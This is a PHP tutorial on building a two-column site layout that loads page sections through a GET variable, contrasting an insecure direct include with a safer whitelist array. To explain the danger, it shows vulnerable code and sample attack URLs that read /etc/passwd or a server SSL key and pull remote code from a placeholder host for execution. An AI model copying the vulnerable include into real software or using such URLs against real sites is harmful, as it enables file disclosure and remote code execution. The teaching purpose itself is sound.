1. 2 column layout
The sub sections of an internet page has often a similar layout. On the left there is a menu and in the center there is the content to show. This is realised with the include statement and a main file. Depending on a GET variable the main file selects the right php file to include.
The main file, often called index.php, is used to
load the excluded html code with include or
readfile or output its direct with echo
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
include 'header.html'; // doctype, <html> and the whole <head> tag
echo " <body>\n";
include 'menu.html';
// load section
echo " </body>\n";
echo "</html>\n";
?>
The header.html file contains everything about the
html stuff and the menu.html shows the menu with
all links to the sections.
2. Loading a section by a GET variable
As a GET variable should load the specific section we must think about how it is loaded. The first way to choose would be to use the GET variable directly at include.
<?php
if (isset($_GET['section'])) {
include $_GET['section'];
} else {
include 'news.php'; // loading the default part
}
?>
This way you can load the news with index.php?section=news.php
or the guestbook with index.php?section=guestbook.php.
But if you use this code this is the same as putting your
login of your server on your homepage. A so called GET include
allowes everyone to load every file. First you can load
server files like index.php?section=/etc/passwd
or index.php?section=/etc/apache2/ssl/server.key (if you
got the proper rights). But be more dangerous it can load
every php script. If someone opens index.php?section=http://www.example.com/evil_code.txt
php loads the code from this url as php and executes it.
A better and more secure way is to restrict the files which can be loaded. There are several ways like restricting the directory or checking the file names. The best one is to use an array. The array use values for all valid filenames and string indexes to access them. This is called an Array include. This way you can specific with the GET variable which file to load.
<?php
$section = array();
$section['news'] = 'news.php';
$section['gb'] = 'guestbook.php';
$section['info'] = 'info.php';
?>
Depending on the GET variable we load the right file.
<?php
include $section[$_GET['section']];
?>
In this code we can get two index errors. First the user can
open the url without a section variable. Second
the user can try to load a section which doesn't exists. For both
ways we use the isset statement before we include the file.
<?php
if (isset($_GET['section'], $section[$_GET['section']])) {
include $section[$_GET['section']];
} else {
include $section['news'];
}
?>
This can be used now in your index.php file.
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
$section = array();
$section['news'] = 'news.php';
$section['gb'] = 'guestbook.php';
$section['info'] = 'info.php';
include 'header.html'; // doctype, <html> and the whole <head> tag
echo " <body>\n";
include 'menu.html';
if (isset($_GET['section'], $section[$_GET['section']])) {
include $section[$_GET['section']];
} else {
include $section['news'];
}
echo " </body>\n";
echo "</html>\n";
?>
A new section can easily added to the $section-Array.
